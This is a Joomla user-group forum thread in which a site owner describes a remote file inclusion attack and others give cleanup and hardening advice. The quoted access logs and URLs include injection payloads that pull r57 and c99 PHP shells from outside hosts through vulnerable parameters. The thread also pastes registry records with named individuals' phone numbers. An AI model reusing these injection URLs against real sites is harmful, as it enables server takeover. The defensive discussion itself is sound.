Joomla Chicago CMS Group

Is there a way to add a deny in the .htaccess to forbid redirects to .txt files? We were "hacked" so to speak by someone using a r57.txt file which used custom_pages to redirect to

88.234.215.86 - "GET /template_css.css HTTP/1.1" 404 500 "index.php?option=com_custompages&cpage=http://www.evilc0der.com/r57.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008031806 Minefield/3.0b5pre"

This script tells you everything about the server, execute a command on a server, allows you to edit a file, upload a file, download a file, find suid files, eval PHP code, upload or download files from remote server, ftp-bruteforce, etc. Nice, eh?

We were hit at 12:03p and we found it at 12:17p. Removed it and all. Soon after, we had a ton of tries with various ending scripts:
80.67.21.105 - "GET /index.php?option=com_custompages&Itemid=62//index.php?option=com_custompages&cpage=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 403 776 "-" "libwww-perl/5.808"
They didn't get anywhere at all but they're persistent little b's /

The component was removed and we swept through the site and don't see anything other than a kiddie saying we were owned on the main page (not a very creative guy, btw) ... We spent hours upon hours checking every damn file not to mention looking at the database for odd info. Is there a way to absolutely make sure redirects to a txt file are denied?

Another thing we noticed was someone trying to do:
/classes/core/language.php?rootdir=http://bashdrfunk.fileave.com/t.txt???

It didn't work but as I said, I'd be more comfortable making sure that we can kill that altogether.

Another thing, shouldn't this work?
<IfModule setenvif_module>
BrowserMatchNoCase ^libwww-perl* evildoer
</IfModule>
Deny from env=evildoer


Thanks in advance.

Diane,
Keep this website in your favorites. www.joomlarescue.com

This is Tom Canavan's website and he is the Joomla security guru of all Joomla gurus. He actually just helped me last weekend and also 2 other very large Joomla based commercial providers that were hacked within the past month. He is the absolute best when it comes to fixing hacked Joomla sites and getting them tightened up on any security holes. He is also one of our members and one of the speakers at JoomlaEXPO. I can't say enough good things about him.

I'll contact him and let him know that you need some help. He is very quick at helping people.
Thanks
Mike

Hi Diane,

the code to block an IP is simple.

But the fact is they got in. Just blocking them at one IP won't get it.

In fact, I am working on one right now thats in Australia. They have a root kit - in fact they had the R57 shell, the VB.PHP shell and the C99 shell.

Sadly - they (bad guys) have completely comprised this server and it will have to be rebuilt.

I found another backdoor from a hacker site.

In anycase, the block code would work for that, but there are soooooo many different ways.

Let me know if I can be of help -

Thanks

Tom

Blocking the IP, I'm doing but they're using a bot it seems so that doesn't help. I was hoping there was a way for the redirect to just die if it has a .txt? file extension in it.

I'm going to take another look at the server again but from the logs, they aren't able to get in. They were using the com_custompages to redirect to the r57 script. From the logs, initial filechecks, and datestamps, etc., I didn't see any other installations of files or anything untoward.

Here's hoping, I'm not wrong.

Any recommendations on what else I should be checking in the files/directories? Did your bad guys install things in certain directories or was it a free for all? Thanks.

Hour 5 in progress.

I have eradicated all known instances of it yet.
http://www.thedomainnamehere//?mosConfig_absolute_path=http%3A%2F%2Fxxxx.us%2Fshell%2Fc99.txt%3F&act=tools&d=%2Fhome%2Fyyyyyy%2F

Fires up a LOVELY command shell..

let's see... I could "kill" the process for the car lot running, I could stop exim running, i could format the server...

see - by the time they penetrate you to PUT a shell on...it might be bad

As a hint. look in EVERY index.* file in EVERY sub directory.

look for permissions wrong, etc. etc

got a backup? If so I'd consider restoring.

Thanks

T

p.s. -- the above URL has been sanitized and will go now where.

http://www.iana.org/assignments/port-numbers

check which ports are open also on your server.


btw - they WON'T like you checking (the host).

role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: *****@ttnet.net.tr

your attacker hails from Turkey - or at least (potentially) wants you to believe so...

and your second attacker:
person: Tobias Marburg
address: domainfactory GmbH
address: Oskar-Messter-Str. 33
address: 85737 Ismaning
address: DE
phone: +49 89 55266 0
fax-no: +49 89 55266 222
e-mail: **@domainfactory.de
nic-hdl: TM1876-RIPE
notify: **@domainfactory.de
changed: **@domainfactory.de 20040706
source: RIPE
mnt-by: MNT-DOMAINFACTORY

person: Jochen Tuchbreiter
address: domainfactory GmbH
address: Oskar-Messter-Str. 33
address: 85737 Ismaning
address: DE
phone: +49 89 55266 112
fax-no: +49 89 55266 222
nic-hdl: JT218-RIPE
remarks: technical issues only please
mnt-by: MNT-DOMAINFACTORY
source: RIPE
abuse-mailbox: *****@ispgateway.de
changed: ***@domainfactory.de 20070608

is from Germany. Chance's are you are root-kitted, but, I'd advise my host. - Anyway - thats about it. Best of luck.

Thanks for the help here. One more question (forgive me - v. sick and exhausted so may not be too coherent here )-- for example:

If there is a script found in a directory my virtual server (and I) don't have access to, like, /var/tmp/ for example. Does this mean that it is the host's server itself that is compromised and in turn so am I and the other virtual hosts? Or just because a script is found in a directory outside my virtual server, that doesn't mean that it isn't just mine?

Did that make sense?

You probably won't like this answer.

It Depends - it could be either situation or neither situation.

You could have a vulnerable version of J!, a vulnderable extension, you might have Front-Page Extensions running (a hole in and of itself). etc

If the physical server is infected, then yes, you got it from them. If your site ONLY is infected, then you have a localized (but severe) problem.

Hope you feel better.

Happy Easter all!

T